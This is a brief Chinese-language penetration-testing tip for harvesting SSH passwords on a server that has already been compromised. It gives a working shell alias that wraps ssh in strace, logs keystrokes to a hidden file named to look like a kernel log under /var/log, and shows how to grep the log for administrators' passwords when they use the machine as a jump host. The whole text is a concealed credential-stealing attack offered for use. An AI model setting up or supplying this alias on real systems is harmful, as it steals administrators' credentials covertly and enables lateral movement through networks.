有时候渗透搞下一台服务器的权限,想通过此服务器抓取其他服务器的ssh密码。就可以用以下方法,如果管理员通过这台服务器作为跳板登录其他服务器,密码就会记录下来。
alias ssh='strace -o /var/log/.kernel-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh' 会把ssh的账号密码输入保存到 /var/log/.kernel*里边。
然后通过 grep "read(5" 查找即可。
注:如果未安装strace ,需要先进行安装。